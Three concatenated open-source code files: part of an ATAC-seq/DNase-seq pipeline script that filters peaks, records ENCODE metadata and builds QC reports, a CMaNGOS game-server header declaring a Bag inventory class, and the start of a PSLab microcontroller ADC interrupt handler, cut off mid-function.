"peak_pooled" ) if ( !disable_gb_peak ) { peak_to_bigbed( "gappedPeak", filt_gpeak_pooled_001, filt_gpeak_pooled_001.dirName(), "gpeak_pooled" ) } } string[] filt_peaks, filt_gpeaks for (int rep=1; rep<=get_num_rep(); rep++) { filt_peak_001 := \ blacklist_filter_peak( "narrowPeak", peak_001{rep}, (peak_001{rep}).dirName(), "peak $rep" ) string filt_gpeak_001 if ( !disable_gb_peak ) { filt_gpeak_001 = \ blacklist_filter_peak( "gappedPeak", gpeak_001{rep}, (gpeak_001{rep}).dirName(), "gpeak $rep" ) } wait // For ENCODE accession, use different step name for single rep case string ENCODE_step_name if ( is_input_fastq( rep ) ) { if ( get_num_rep() == 1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-peaks-filter-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-peaks-filter-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "raw peaks", \ ENCODE_step_name, filt_peak_001, [filt_bam{rep}]) if ( !disable_gb_peak ) { add_ENCODE_metadata_to_summary_json( "bed", "gappedPeak", "raw peaks", \ ENCODE_step_name, filt_gpeak_001, [filt_bam{rep}]) } if ( get_num_rep() == 1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-signal-generation-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-signal-generation-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigWig", "", "signal p-value", \ ENCODE_step_name, pval_bigwig_001{rep}, [filt_bam{rep}]) add_ENCODE_metadata_to_summary_json( "bigWig", "", "fold change over control", \ ENCODE_step_name, fc_bigwig_001{rep}, [filt_bam{rep}]) npeak_bb := peak_to_bigbed( "narrowPeak", filt_peak_001, filt_peak_001.dirName(), "peak $rep" ) string gpeak_bb if ( !disable_gb_peak ) { gpeak_bb = peak_to_bigbed( "gappedPeak", filt_gpeak_001, filt_gpeak_001.dirName(), "gpeak $rep" ) } wait if ( get_num_rep() == 1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-filtered-peaks-to-bigbed-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-filtered-peaks-to-bigbed-step-run-v1" 
add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "raw peaks", \ ENCODE_step_name, npeak_bb, [filt_peak_001]) if ( !disable_gb_peak ) { add_ENCODE_metadata_to_summary_json( "bigBed", "gappedPeak", "raw peaks", \ ENCODE_step_name, gpeak_bb, [filt_gpeak_001]) } } filt_peaks.add(filt_peak_001) if ( !disable_gb_peak ) { filt_gpeaks.add(filt_gpeak_001) } } wait string ENCODE_step_name if ( enable_idr && idr_qc && idr_opt && idr_consv ) { string[] idr_ENCODE // IDR peaks if ( idr_pr.hasKey(1) && get_num_rep()==1 ) { idr_ENCODE = [idr_pr{1}] ENCODE_step_name = "anshul-kundaje:atac-seq-unreplicated-idr-step-run-single-rep-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "pseudoreplicated idr thresholded peaks", \ ENCODE_step_name, idr_pr{1}, filt_peaks ) idr_bb := peak_to_bigbed( "narrowPeak", idr_pr{1}, idr_pr{1}.dirName(), "idr peak pr" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-pseudoreplicated-idr-peaks-conversion-step-run-single-rep-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "pseudoreplicated idr thresholded peaks", \ ENCODE_step_name, idr_bb, [idr_pr{1}] ) } else { // find idr_opt and idr_consv idr_ENCODE = [idr_opt] ENCODE_step_name = "anshul-kundaje:atac-seq-idr-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "optimal idr thresholded peaks", \ ENCODE_step_name, idr_opt, filt_peaks ) idr_opt_bb := peak_to_bigbed( "narrowPeak", idr_opt, idr_opt.dirName(), "idr peak opt" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-idr-peaks-conversion-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "optimal idr thresholded peaks", \ ENCODE_step_name, idr_opt_bb, [idr_opt]) if ( idr_consv && get_basename( idr_opt )!=get_basename( idr_consv ) ) { ENCODE_step_name = "anshul-kundaje:atac-seq-idr-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "conservative idr thresholded peaks", \ ENCODE_step_name, idr_consv, filt_peaks ) idr_consv_bb := peak_to_bigbed( 
"narrowPeak", idr_consv, idr_consv.dirName(), "idr peak consv" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-idr-peaks-conversion-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "conservative idr thresholded peaks", \ ENCODE_step_name, idr_consv_bb, [idr_consv] ) } } if ( !true_rep ) { if ( get_num_rep()==1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-unreplicated-idr-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-idr-step-run-v1" add_ENCODE_quality_metrics_to_summary_json( "idr_quality_metric", \ ENCODE_step_name, \ idr_ENCODE, \ [ idr_qc, \ idr_qc_FRiP.hasKey("ppr") ? idr_qc_FRiP{"ppr"} : "",\ idr_qc_FRiP.hasKey("rep1-rep2") ? idr_qc_FRiP{"rep1-rep2"} : "",\ idr_qc_FRiP.hasKey("rep1-pr") ? idr_qc_FRiP{"rep1-pr"} : "",\ idr_qc_FRiP.hasKey("rep2-pr") ? idr_qc_FRiP{"rep2-pr"} : ""], \ [ "$idr_thresh", \ idr_tr_png.hasKey("1,2") ? idr_tr_png{"1,2"} : "", \ idr_pr_png.hasKey(1) ? idr_pr_png{1} : "", \ idr_pr_png.hasKey(2) ? idr_pr_png{2} : "", \ idr_ppr_png, \ idr_tr_log.hasKey("1,2") ? idr_tr_log{"1,2"} : "", \ idr_pr_log.hasKey(1) ? idr_pr_log{1} : "", \ idr_pr_log.hasKey(2) ? 
idr_pr_log{2} : "", \ idr_ppr_log]) } } if ( peak_overlap_qc && peak_overlap_opt && peak_overlap_consv ) { string[] peak_overlap_ENCODE // overlap peaks if ( peak_overlap_pr.hasKey(1) && get_num_rep()==1 ) { peak_overlap_ENCODE = [peak_overlap_pr{1}] ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-single-rep-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "pseudoreplicated stable peaks", \ ENCODE_step_name, peak_overlap_pr{1}, filt_peaks ) peak_overlap_bb := peak_to_bigbed( "narrowPeak", peak_overlap_pr{1}, peak_overlap_pr{1}.dirName(), "overlap peak pr" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-pseudoreplicated-overlap-peaks-conversion-step-run-single-rep-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "pseudoreplicated overlap thresholded peaks", \ ENCODE_step_name, peak_overlap_bb, [peak_overlap_pr{1}] ) } else { // find peak_overlap_opt and peak_overlap_consv peak_overlap_ENCODE = [peak_overlap_opt] ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "replicated peaks", \ ENCODE_step_name, peak_overlap_opt, filt_peaks ) peak_overlap_opt_bb := peak_to_bigbed( "narrowPeak", peak_overlap_opt, peak_overlap_opt.dirName(), "overlap peak opt" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-peaks-conversion-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "replicated peaks", \ ENCODE_step_name, peak_overlap_opt_bb, [peak_overlap_opt]) if ( peak_overlap_consv && get_basename( peak_overlap_opt )!=get_basename( peak_overlap_consv ) ) { ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "conservative replicated peaks", \ ENCODE_step_name, peak_overlap_consv, filt_peaks ) peak_overlap_consv_bb := peak_to_bigbed( "narrowPeak", peak_overlap_consv, peak_overlap_consv.dirName(), "overlap peak consv" ) wait ENCODE_step_name = 
"anshul-kundaje:atac-seq-overlap-peaks-conversion-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "conservative replicated peaks", \ ENCODE_step_name, peak_overlap_consv_bb, [peak_overlap_consv] ) } } if ( !true_rep ) { if ( get_num_rep()==1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-v1" add_ENCODE_quality_metrics_to_summary_json( "overlap_quality_metric", \ ENCODE_step_name, \ peak_overlap_ENCODE, \ [ peak_overlap_qc, \ peak_overlap_qc_FRiP.hasKey("ppr") ? peak_overlap_qc_FRiP{"ppr"} : "",\ peak_overlap_qc_FRiP.hasKey("rep1-rep2") ? peak_overlap_qc_FRiP{"rep1-rep2"} : "",\ peak_overlap_qc_FRiP.hasKey("rep1-pr") ? peak_overlap_qc_FRiP{"rep1-pr"} : "",\ peak_overlap_qc_FRiP.hasKey("rep2-pr") ? peak_overlap_qc_FRiP{"rep2-pr"} : ""]) } } wait print( "\n== Done filter_peak_and_convert_to_bigbed()\n" ) } void ataqc() { if ( no_ataqc || align ) return if ( is_input_peak() ) return for (int rep=1; rep<=get_num_rep(); rep++) { if ( no_par ) ataqc( rep ) else par ataqc( rep ) } wait print( "\n== Done ataqc()\n" ) } void ataqc( int rep ) { if ( true_rep ) { print("Warning: ATAQC cannot run with a flag -true_rep\n"); return } if ( no_dup_removal ) { print("Warning: ATAQC cannot run with the flag -no_dup_removal\n"); return } group := get_group_name( rep ) long := get_long_group_name( rep ) qc_o_dir := mkdir( "$out_dir/qc/$group" ) aln_o_dir := mkdir( "$out_dir/align/$group" ) // create align output directory if ( bam.hasKey(rep) ) { string idr_ataqc, peak if ( !enable_idr ) { idr_ataqc = "" peak = peak_overlap_opt } else if ( get_num_rep() == 1 ) { idr_ataqc = idr_pr{1} peak = idr_pr{rep} } else { idr_ataqc = idr_opt peak = idr_pr{rep} } string ataqc_html if ( is_se( rep ) ) { ( ataqc_html, ataqc_qc{rep} ) = ataqc( fastq{rep}, "", bam{rep}, align_log{rep}, pbc_qc{rep}, \ dup_qc{rep}, filt_bam{rep}, final_tag{rep}, pval_bigwig_001{rep}, peak, \ 
peak_overlap_opt, idr_ataqc, qc_o_dir, group ) } else { ( ataqc_html, ataqc_qc{rep} ) = ataqc( fastq{rep+",1"}, fastq{rep+",2"}, bam{rep}, align_log{rep}, pbc_qc{rep}, \ dup_qc{rep}, filt_bam{rep}, final_tag{rep}, pval_bigwig_001{rep}, peak, \ peak_overlap_opt, idr_ataqc, qc_o_dir, group ) } add_file_to_report( ataqc_html, "ATAQC\\nreport", group, "QC and logs/ATAQC/$long/ATAQC HTML report" ) } } void report() { wait string html html += html_title() html += html_cmd_line_args() html += html_conf_file_info() html += html_pipeline_version( "https://github.com/kundajelab/atac_dnase_pipelines/commit" ) // pipeline version info html += html_filetable() // treeview for directory and file structure html += html_atac_tracks() // epigenome browser tracks html += html_graph() // graphviz workflow diagram html += html_atac_QC() // show QC tables and images report( html ) write_summary_json() print( "\n== Done report()\n" ) } string html_atac_QC() { string[] align_qcs, flagstat_qcs, dup_qcs, flagstat_nodup_qcs, pbc_qcs, xcor_qcs, xcor_plots, ataqc_qcs string[] groups for ( int rep=1; rep <= get_num_rep(); rep++) { group := "rep$rep" key := "$rep" groups.add( group ) if ( xcor_qc.hasKey( key ) ) { xcor_qcs += xcor_qc{key} xcor_plots += xcor_plot{key} } if ( flagstat_qc.hasKey( key ) ) flagstat_qcs += flagstat_qc{key} if ( dup_qc.hasKey( key ) ) dup_qcs += dup_qc{key} if ( flagstat_nodup_qc.hasKey( key ) ) flagstat_nodup_qcs += flagstat_nodup_qc{key} if ( pbc_qc.hasKey( key ) ) pbc_qcs += pbc_qc{key} if ( ataqc_qc.hasKey( key ) ) ataqc_qcs += ataqc_qc{key} } html := "<div id='atac_qc'>" html += "<div style='float:left'>" html += html_table_multiple_logs( "Flagstat (raw) QC", false, "flagstat", groups, flagstat_qcs ) html += "</div>" if ( !no_dup_removal ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Dup. 
QC", false, "dup", groups, dup_qcs ) html += "</div>" html += "<div style='float:left'>" html += html_table_multiple_logs( "Flagstat (filtered) QC", false, "flagstat_filt", groups, flagstat_nodup_qcs ) html += "</div>" html += "<div style='float:left'>" html += html_table_multiple_logs( "Library Complexity QC", false, has_pe() ? "pbc_PE" : "pbc", groups, pbc_qcs ) if ( pbc_qcs.size()>0 ) html += html_help_pbc() html += "</div>" } html += "<div style='float:left'>" html += html_table_multiple_logs( "Enrichment QC (strand cross-correlation measures)", false, "xcor", groups, xcor_qcs ) if ( xcor_qcs.size()>0 ) html += html_help_xcor( subsample_xcor, has_se(), has_pe() ) html += "</div>" // xcor images for ( int i=0; i<xcor_plots.size(); i++ ) { png := pdf_to_png( xcor_plots[i] ) html += html_img( png, 500, groups[i] ) + "&nbsp" } // number of peaks if ( num_peak_log ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Number of peaks", false, "num_peaks", num_peak_log ) html += html_help_num_peaks() html += "</div>" } // FRiP (Naive overlap) if ( peak_overlap_qc_FRiP.size()>0 ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Enrichment QC (Fraction of reads in overlapping peaks)", false, "overlap_FRiP", peak_overlap_qc_FRiP ) html += html_help_peak_overlap_FRiP() html += "</div>" } if ( peak_overlap_qc != "" ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Reproducibility QC and Peak Detection Statistics (Overlapping peaks)", \ false, "overlap", ["rep1"], [peak_overlap_qc] ) html += html_help_peak_overlap() html += "</div>" } // FRiP (IDR) if ( idr_qc_FRiP.size()>0 ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Enrichment QC (Fraction of reads in IDR peaks)", false, "idr_FRiP", idr_qc_FRiP ) html += html_help_idr_FRiP() html += "</div>" } if ( idr_qc != "" ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Reproducibility QC and Peak Detection 
Statistics (Irreproducible Discovery Rate)", \ false, "idr", ["rep1"], [idr_qc] ) html += html_help_idr( idr_thresh ) html += "</div>" } for ( int i=1; i<=get_num_rep(); i++ ) { for ( int j=i+1; j<=get_num_rep(); j++ ) { if ( idr_tr_png.hasKey("$i,$j") ) \ html += html_img( idr_tr_png{"$i,$j"}, 800, "true reps (rep$i-rep$j)" ) + "&nbsp" } } if ( idr_ppr_png != "" ) html += html_img( idr_ppr_png, 800, "pooled pseudo-reps" ) + "&nbsp" for ( int i=1; i<=get_num_rep(); i++ ) { if ( !true_rep ) { if ( idr_pr_png.hasKey(i) ) \ html += html_img( idr_pr_png{i}, 800, "rep$i pseudo-reps" ) + "&nbsp" } } html += "<div style='float:left'>" html += html_table_multiple_logs( "ATAQC", false, "ataqc", groups, ataqc_qcs ) html += "</div>" html += "</div><br>" return html } string html_atac_tracks() { if ( no_browser_tracks ) return "" string[] trk_files, trk_types, trk_names, trk_colors string color // for (int rep=1; rep<=get_num_rep(); rep++) { // color = get_predefined_rgb_str( rep ) // if ( bam.hasKey(rep) ) { trk_types += "bam"; trk_names += "$title bam (rep$rep)"; trk_colors += color; trk_files += bam{rep} } // } color = get_predefined_rgb_str( 0 ) // color for pooled reps if ( pval_bigwig_001.hasKey( "pooled" ) ) { trk_types += "bigwig"; trk_names += "$title pval (pooled)"; trk_colors += color; trk_files += pval_bigwig_001{"pooled"} } if ( peak_overlap_opt != "" ) { trk_types += "hammock"; trk_names += "$title peak overlap"; trk_colors += color; trk_files += peak_to_hammock( peak_overlap_opt ) } if ( idr_opt != "" ) { trk_types += "hammock"; trk_names += "$title peak idr (opt. 
set)"; trk_colors += color; trk_files += peak_to_hammock( _get_idr_peak_trk( idr_opt ) ) } // find IDR tracks for (int rep=1; rep<=get_num_rep(); rep++) { color = get_predefined_rgb_str( rep ) if ( pval_bigwig_001.hasKey( "$rep" ) ) { trk_types += "bigwig"; trk_names += "$title pval (rep$rep)"; trk_colors += color; trk_files += pval_bigwig_001{rep} } if ( peak_001.hasKey( "$rep" ) ) { trk_types += "hammock"; trk_names += "$title peak (rep$rep)"; trk_colors += color; trk_files += peak_to_hammock( peak_001{rep} ) } if ( idr_pr.hasKey(rep) ) { trk_types += "hammock"; trk_names += "$title peak idr (rep$rep-pr)"; trk_colors += color; trk_files += peak_to_hammock( _get_idr_peak_trk( idr_pr{rep} ) ) } } html := html_epg_browser_viz( trk_files, trk_types, trk_names, trk_colors, species_browser ) return html } void help() { if ( is_cmd_line_arg_empty() ) { printHelp() exit } } bool is_atac_seq() { return type.toLower().startsWith( "atac" ) } bool is_dnase_seq() { return type.toLower().startsWith( "dnase" ) } void tar_all_logs() { // *.align.log: bowtie2 log // *_qc.txt: ATAQC text report // *_qc.html: ATAQC HTML report string tar mkdir("$out_dir/qc") if ( title ) tar = "$out_dir/qc/$title.all_quality_metrics.tar" else tar = "$out_dir/qc/all_quality_metrics.tar" taskName:= "tar_all_logs" system := "local" tid := task { sys cd $out_dir sys find . 
-type f \ -name '*.align.log' -or \ -name '*.dot' -or \ -name '*.svg' -or \ -name '*.css' -or \ -name '*.json' -or \ -name '*.html' -or \ -name '*.js' -or \ -name '*.qc' -or \ -name '*.pdf' -or \ -name '*.png' -or \ -name '*_qc.txt' -or \ -name '*read_length.txt' \ -name '*number_of_peaks.txt' \ | xargs tar -cvf $tar } wait if ( peak_overlap_opt ) { string[] quality_metric_of string ENCODE_step_name if ( peak_overlap_pr.hasKey(1) && get_num_rep()==1 ) { ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-single-rep-v1" quality_metric_of.add(peak_overlap_pr{1}) } else { ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-v1" quality_metric_of.add(peak_overlap_opt) } add_ENCODE_quality_metrics_to_summary_json( "generic_quality_metric", ENCODE_step_name, \ quality_metric_of, [tar] ) } } void ENCODE3_overall_qc() { //// QC for individual replicate for ( int rep=1; rep<=get_num_rep(); rep++ ) { string{} QC if ( rep == 1 ) { if ( idr_opt ) { npeak := get_num_lines( idr_opt ) QC{"03_No. of IDR peaks"} = npeak QC{"03_IDR peaks pass? (threshold > 70K)"} = npeak >= 70000 ? "OK" : "FAIL" } if ( peak_overlap_opt ) { num_overlap_peaks := get_num_lines( peak_overlap_opt ) QC{"04_No. of naive overlap peaks"} = num_overlap_peaks QC{"04_Naive overlap peaks pass? (> 150K)"} = num_overlap_peaks >= 150000 ? "OK" : "FAIL" } // FRIP >0.1 ok (idr) if ( idr_qc_FRiP.hasKey("ppr") ) { idr_qc_FRiP_log := parse_idr_FRiP( idr_qc_FRiP{"ppr"} ) FRiP := parse_real( idr_qc_FRiP_log{"FRiP"} ) QC{"06_IDR FRiP of pooled sample"} = FRiP QC{"06_IDR FRiP of pooled sample QC pass? (> 0.1)"} = FRiP >= 0.1 ? "OK" : "FAIL" } // FRIP >0.1 ok (overlapping peaks) if ( peak_overlap_qc_FRiP.hasKey("ppr") ) { peak_overlap_qc_FRiP_log := parse_idr_FRiP( peak_overlap_qc_FRiP{"ppr"} ) FRiP := parse_real( peak_overlap_qc_FRiP_log{"FRiP"} ) QC{"06_Overlap FRiP of pooled sample"} = FRiP QC{"06_Overlap FRiP of pooled sample QC pass? (> 0.1)"} = FRiP >= 0.1 ? 
"OK" : "FAIL" } // IDR reproducibility test (IDR) if ( idr_qc ) { idr_log := parse_idr( idr_qc ) QC{"07_IDR reproducibility"} = idr_log{"reproducibility_test"}.toUpper() } } if ( idr_qc_FRiP.hasKey("rep$rep-pr") ) { idr_qc_FRiP_log := parse_idr_FRiP( idr_qc_FRiP{"rep$rep-pr"} ) FRiP := parse_real( idr_qc_FRiP_log{"FRiP"} ) QC{"06_IDR FRiP"} = FRiP } if ( peak_overlap_qc_FRiP.hasKey("rep$rep-pr") ) { peak_overlap_qc_FRiP_log := parse_idr_FRiP( peak_overlap_qc_FRiP{"rep$rep-pr"} ) FRiP := parse_real( peak_overlap_qc_FRiP_log{"FRiP"} ) QC{"06_Overlap FRiP"} = FRiP } if ( flagstat_qc.hasKey(rep) && flagstat_nodup_qc.hasKey(rep) ) { flagstat_log := parse_flagstat(flagstat_qc{rep}) flagstat_nodup_log := parse_flagstat(flagstat_nodup_qc{rep}) // num nodup reads > 50000000 (PE), > 25000000 (SE) num_raw_reads := parse_int( flagstat_log{"total"} ) num_mapped_reads := parse_int( flagstat_log{"mapped"} ) num_nodup_reads := parse_int( flagstat_nodup_log{"total"} ) QC{"01_No. of mapped nodup nomito reads"} = num_nodup_reads if ( is_se( rep ) ) { QC{"01_Read depth pass? (>50M for PE, >25M SE)"} = num_nodup_reads >= 25000000 ? "OK" : "FAIL" } else { QC{"01_Read depth pass? (>50M for PE, >25M SE)"} = num_nodup_reads >= 50000000 ? "OK" : "FAIL" } // alignment rate > 80% ok, > 95% good (FLAGSTAT.%MAPPED) alignment_rate := "$num_mapped_reads".parseReal()/"$num_raw_reads".parseReal() QC{"02_Alignment rate"} = alignment_rate QC{"02_Alignment rate pass? (>0.95 OK, >0.8 ACCEPTABLE"} = alignment_rate >= 0.95 ? "OK" : \ ( alignment_rate >= 0.80 ? "ACCEPTABLE" : "FAIL" ) } // FRIP >0.1 ok if ( idr_qc_FRiP.hasKey("rep$rep-pr") ) { idr_qc_FRiP_log := parse_idr_FRiP( idr_qc_FRiP{"rep$rep-pr"} ) FRiP := parse_real( idr_qc_FRiP_log{"FRiP"} ) QC{"05_FRiP per replicate"} = FRiP QC{"05_FRiP per replicate QC pass? (> 0.1)"} = FRiP >= 0.1 ? 
"OK" : "FAIL" } if ( ataqc_qc.hasKey(rep) ) { ataqc_log := parse_multi_col_txt( ataqc_qc{rep} ) // TSS enrichment (ATAQC) > 10 TSS_enrichment := parse_real( ataqc_log{"TSS_enrichment"} ) QC{"08_TSS enrichment"} = TSS_enrichment QC{"08_TSS enrichment pass? (> 10)"} = TSS_enrichment >= 10.0 ? "OK" : "FAIL" // NFR present (ATAQC) QC{"09_NFR region"} = ataqc_log.hasKey("Presence of NFR peak") ? \ ataqc_log{"Presence of NFR peak"} : "N/A" // (SKIP) mono-nucleosome peak present? 147*2 > length > 147. QC{"10_mono-nuc region"} = ataqc_log.hasKey("Presence of Mono-Nuc peak") ? \ ataqc_log{"Presence of Mono-Nuc peak"} : "N/A" } if ( pbc_qc.hasKey(rep) ) { pbc_log := parse_pbc(pbc_qc{rep}) QC{"11_NRF"} = pbc_log{"NRF"} QC{"12_PBC1"} = pbc_log{"PBC1"} QC{"13_PBC2"} = pbc_log{"PBC2"} } _summary_qc.add( map_to_json_str( \ { "info"=>"rep$rep","qc_type"=>"ENCODE3_qc_consolidated",\ "header"=>array_to_str(get_map_keys( QC ),"\\t"),\ "contents"=>array_to_str(get_map_vals( QC ),"\\t") } ) ) } }
{ "pile_set_name": "Github" }
/*
 * This file is part of the CMaNGOS Project. See AUTHORS file for Copyright information
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */

#ifndef MANGOS_BAG_H
#define MANGOS_BAG_H

#include "Common.h"
#include "Entities/Item.h"

// Sentinel values used when addressing inventory positions:
// NULL_BAG / NULL_SLOT appear to mean "no bag" / "no slot" respectively.
enum InventorySlot
{
    NULL_BAG  = 0,
    NULL_SLOT = 255
};

// Maximum 36 Slots ( (CONTAINER_END - CONTAINER_FIELD_SLOT_1)/2 )
#define MAX_BAG_SIZE 36                                     // 2.0.12

/**
 * A container item: an Item that itself holds up to MAX_BAG_SIZE other
 * Items in its m_bagslot array. Overrides the Item world/DB hooks so the
 * container is handled as a unit.
 */
class Bag : public Item
{
    public:
        Bag();
        ~Bag();

        // overwrite virtual Item::AddToWorld / Item::RemoveFromWorld
        // NOTE(review): presumably these also add/remove the contained
        // items from the world -- confirm against Bag.cpp.
        void AddToWorld() override;
        void RemoveFromWorld() override;

        // overwrite virtual Item::Create; initializes this bag from the
        // given item template for the given owner.
        bool Create(uint32 guidlow, uint32 itemid, Player const* owner) override;

        // In-memory slot management (persistence is done via SaveToDB).
        // StoreItem places pItem at the given slot index; RemoveItem
        // clears that slot.
        void StoreItem(uint8 slot, Item* pItem);
        void RemoveItem(uint8 slot);

        // Lookup helpers: by slot index, by item entry (template id),
        // and a count of items matching an entry. NOTE(review): the role
        // of eItem in GetItemCount (filter vs. exclusion) is not visible
        // here -- verify in the implementation.
        Item* GetItemByPos(uint8 slot) const;
        Item* GetItemByEntry(uint32 item) const;
        uint32 GetItemCount(uint32 item, Item* eItem = nullptr) const;

        // Returns the slot index holding the item with the given guid
        // (sentinel on miss -- presumably NULL_SLOT; confirm in Bag.cpp).
        uint8 GetSlotByItemGUID(ObjectGuid guid) const;
        bool IsEmpty() const;
        uint32 GetFreeSlots() const;
        // Number of usable slots, read from the container's
        // CONTAINER_FIELD_NUM_SLOTS update field (<= MAX_BAG_SIZE).
        uint32 GetBagSize() const { return GetUInt32Value(CONTAINER_FIELD_NUM_SLOTS); }

        // DB operations
        // overwrite virtual Item::SaveToDB
        void SaveToDB() override;
        // overwrite virtual Item::LoadFromDB
        bool LoadFromDB(uint32 guidLow, Field* fields, ObjectGuid ownerGuid = ObjectGuid()) override;
        // overwrite virtual Item::DeleteFromDB
        void DeleteFromDB() override;

        // Builds the client update block for this container for the
        // given player (override of the Item/Object update path).
        void BuildCreateUpdateBlockForPlayer(UpdateData* data, Player* target) const override;

    protected:
        // Bag Storage space: fixed-size raw slot array; unused entries
        // are presumably nullptr (see IsEmpty/GetFreeSlots) -- verify.
        Item* m_bagslot[MAX_BAG_SIZE];
};

// Factory: allocate a Bag when the prototype's inventory type is
// INVTYPE_BAG, otherwise a plain Item. Caller takes ownership.
inline Item* NewItemOrBag(ItemPrototype const* proto)
{
    if (proto->InventoryType == INVTYPE_BAG)
        return new Bag;

    return new Item;
}

#endif
{ "pile_set_name": "Github" }
/******************************************************************************/
/******** This file contains ADC control modules of function.c file ***********/
/******************************************************************************/

#include "COMMANDS.h"
#include "Common_Functions.h"
#include "PSLAB_SPI.h"
#include "PSLAB_ADC.h"

/* --- Module state shared between the init routines and the ADC ISR --- */
BYTE CHOSA = 3;                 // analog input currently routed to sample/hold CH0
BYTE CH123SA = 0;               // input-group selection for sample/holds CH1..CH3
BYTE conversion_done = 1;       // 1 = capture finished (ISR becomes a no-op)
BYTE TRIGGERED = 0;             // 1 = trigger condition met, ISR is storing samples
BYTE TRIGGER_READY = 0;         // armed once the signal rises above the trigger level
BYTE TRIGGER_CHANNEL = 0;       // bit mask choosing which ADC1BUFx feeds the trigger
BYTE ADC_CHANNELS = 0;          // number of extra channels (beyond CH0) to store
uint16 TRIGGER_TIMEOUT = 100, TRIGGER_WAITING = 0, TRIGGER_LEVEL = 0, TRIGGER_PRESCALER = 0;
uint16 adval;                   // last value examined by the trigger logic
uint16 ADC_DELAY = 5;           // Timer5 period (sample interval) in timer ticks
int *buff0, *buff1, *buff2, *buff3; // write cursors into ADCbuffer, one per channel
int samples = 0;                // samples stored so far in the current capture
uint16 samples_to_fetch = BUFFER_SIZE; // capture length; must not exceed buffer space
int __attribute__((section("adcbuff"), far)) ADCbuffer[BUFFER_SIZE];

/*
 * ADC1 conversion-complete ISR.
 * Before the trigger fires it only watches the selected channel for a
 * rising-then-falling crossing of TRIGGER_LEVEL (with a +10 count arming
 * hysteresis); once TRIGGERED it stores up to ADC_CHANNELS+1 results per
 * interrupt through the buffN cursors until samples_to_fetch is reached.
 * NOTE(review): no bounds check besides the samples counter -- callers must
 * size buff0..buff3 for samples_to_fetch entries. LEDPIN is used as a
 * busy/done indicator.
 */
void __attribute__((interrupt, no_auto_psv)) _AD1Interrupt(void)
{
    _AD1IF = 0;
    if (conversion_done) { return; }            // capture already finished; ignore
    LEDPIN = 1;
    if (TRIGGERED)
    {
        *(buff0++) = (ADC1BUF0);                // &0x3ff;
        if (ADC_CHANNELS >= 1)
        {
            *(buff1++) = (ADC1BUF1);            // &0x3ff;
            if (ADC_CHANNELS >= 2)
            {
                *buff2++ = (ADC1BUF2);          // &0x3ff;
                if (ADC_CHANNELS >= 3)*buff3++ = (ADC1BUF3); // &0x3ff;
            }
        }
        samples++;
        LEDPIN = 0;
        if (samples == samples_to_fetch)
        {
            _AD1IF = 0;
            _AD1IE = 0;                         // disable any further interrupts until required
            conversion_done = 1;
            LEDPIN = 1;
        }
    }
    else
    {
        // Pick the buffer that corresponds to the trigger source channel.
        if (TRIGGER_CHANNEL & 1)adval = ADC1BUF0;
        else if (TRIGGER_CHANNEL & 2)adval = ADC1BUF1;
        else if (TRIGGER_CHANNEL & 4)adval = ADC1BUF2;
        else if (TRIGGER_CHANNEL & 8)adval = ADC1BUF3;

        //-------If the trigger hasn't timed out yet ... ----------
        if (TRIGGER_WAITING < TRIGGER_TIMEOUT)
        {
            TRIGGER_WAITING += (ADC_DELAY >> TRIGGER_PRESCALER);
            // Arm above (level+10), fire on the falling crossing of the level.
            if (!TRIGGER_READY && adval > TRIGGER_LEVEL + 10)TRIGGER_READY = 1;
            else if (adval <= TRIGGER_LEVEL && TRIGGER_READY)
            {
                TRIGGERED = 1;
            }
        }
        //-------If the trigger has timed out, then proceed to data acquisition ----------
        else
        {
            TRIGGERED = 1;
